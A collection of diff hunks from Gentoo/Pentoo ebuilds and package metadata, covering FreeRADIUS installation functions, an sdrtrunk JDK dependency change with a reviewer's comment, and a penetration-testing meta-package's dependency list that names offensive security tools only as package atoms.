rm "${ED}"/usr/sbin/rc.radiusd || die
newinitd "${FILESDIR}"/radius.init-r4 radiusd
newconfd "${FILESDIR}"/radius.conf-r6 radiusd
if ! use systemd ; then
# If systemd builtin is not enabled we need use Type=Simple
# as systemd .service
sed -i -e 's:^Type=.*::g' \
-e 's:^WatchdogSec=.*::g' -e 's:^NotifyAccess=all.*::g' \
"${S}"/debian/freeradius.service
fi
systemd_dounit "${S}"/debian/freeradius.service
find "${ED}" \( -name "*.a" -o -name "*.la" \) -delete || die
}
pkg_config() {
if use ssl ; then
cd "${ROOT}"/etc/raddb/certs || die
./bootstrap || die "Error while running ./bootstrap script."
chown root:radius "${ROOT}"/etc/raddb/certs || die
chown root:radius "${ROOT}"/etc/raddb/certs/ca.pem || die
chown root:radius "${ROOT}"/etc/raddb/certs/server.{key,crt,pem} || die
fi
}
pkg_preinst() {
if ! has_version ${CATEGORY}/${PN} && use ssl ; then
elog "You have to run \`emerge --config =${CATEGORY}/${PF}\` to be able"
elog "to start the radiusd service."
fi
}


@ -1,22 +0,0 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE pkgmetadata SYSTEM "https://www.gentoo.org/dtd/metadata.dtd">
<pkgmetadata>
<!-- maintainer-needed -->
<use>
<flag name="memcached">
Include <pkg>dev-libs/libmemcached</pkg> in caching drivers
</flag>
<flag name="redis">
Include support for Redis database
</flag>
<flag name="mongodb">
Include support for MongoDB database
</flag>
<flag name="wpe">
Include support for WPE hacking
</flag>
</use>
<upstream>
<remote-id type="github">FreeRADIUS/freeradius-server</remote-id>
</upstream>
</pkgmetadata>


@ -1,4 +1,4 @@
# Copyright 1999-2024 Gentoo Authors # Copyright 1999-2025 Gentoo Authors
# Distributed under the terms of the GNU General Public License v2 # Distributed under the terms of the GNU General Public License v2
EAPI=8 EAPI=8
@ -22,9 +22,10 @@ SLOT="0"
# FIXME: missing deps: # FIXME: missing deps:
# JDK/JavaFX 23 or JavaFX 24 # JDK/JavaFX 23 or JavaFX 24
RDEPEND="virtual/jdk:24 RDEPEND="
!net-wireless/sdrtrunk-bin !net-wireless/sdrtrunk-bin
dev-java/openjdk:24[alsa] virtual/jdk:21
dev-java/openjdk:21[alsa]
media-libs/alsa-lib media-libs/alsa-lib
media-libs/freetype media-libs/freetype
media-libs/giflib:= media-libs/giflib:=
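Review bot: The FIXME comment kept directly above RDEPEND still says the package needs "JDK/JavaFX 23 or JavaFX 24", while the new dependency lines, as far as the rendered old/new columns show, pin `virtual/jdk:21` and `dev-java/openjdk:21[alsa]`. The ebuild now documents a requirement that its own dependencies do not meet, and a clean NonexistentDeps result only shows that the atoms exist, not that the program runs on 21. If the lower slot is a deliberate stopgap, the comment should say so, for example `# FIXME: upstream wants JDK/JavaFX 23 or 24; pinned to :21 until a newer slot is in the tree`. It is also worth confirming whether both atoms are needed, since `virtual/jdk:21` can presumably be satisfied by a provider other than the `openjdk:21[alsa]` that is also required. The rest of the ebuild lies outside this hunk, so any Java version check elsewhere in the file is not visible here.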


@ -1,4 +1,4 @@
# Copyright 1999-2024 Gentoo Authors # Copyright 1999-2025 Gentoo Authors
# Distributed under the terms of the GNU General Public License v2 # Distributed under the terms of the GNU General Public License v2
EAPI=8 EAPI=8
@ -12,14 +12,13 @@ KEYWORDS="~amd64 ~x86"
IUSE="pentoo-extra pentoo-full" IUSE="pentoo-extra pentoo-full"
PDEPEND=" PDEPEND="
amd64? ( app-exploits/empire )
app-exploits/pypykatz app-exploits/pypykatz
app-exploits/webshells app-exploits/webshells
net-analyzer/responder net-analyzer/responder
dev-util/pwntools dev-util/pwntools
pentoo-full? ( pentoo-full? (
amd64? ( app-exploits/deathstar amd64? (
net-analyzer/crackmapexec ) net-analyzer/crackmapexec )
app-exploits/weevely app-exploits/weevely
app-forensics/make-pdf app-forensics/make-pdf
@ -35,3 +34,7 @@ PDEPEND="
# the 9999 svn version takes really long time to install. Removing it, until there is a better way to do it # the 9999 svn version takes really long time to install. Removing it, until there is a better way to do it
#app-exploits/exploitdb #app-exploits/exploitdb
# Removed because of unsatisfied deps
#amd64? ( app-exploits/empire )
#amd64? ( app-exploits/deathstar